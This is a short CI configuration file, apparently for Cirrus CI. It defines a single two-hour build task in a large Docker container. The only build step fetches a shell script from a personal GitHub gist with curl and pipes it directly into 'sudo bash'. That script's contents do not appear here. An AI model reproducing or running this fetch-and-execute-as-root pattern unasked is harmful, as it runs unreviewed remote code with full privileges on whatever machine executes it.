task:

  name: Builds
  timeout_in: 120m
  container:
    dockerfile: Dockerfile
    cpu: 8
    memory: 32G
  
  env:
    CIRRUS_WORKING_DIR: "/tmp/ci"

  build_script:
    - curl https://gist.githubusercontent.com/karthik4579/cc43060742999cb85befb93299474fe2/raw/9114e6a141153465a621c64acd2a1423f5c9894a/code.sh | sudo bash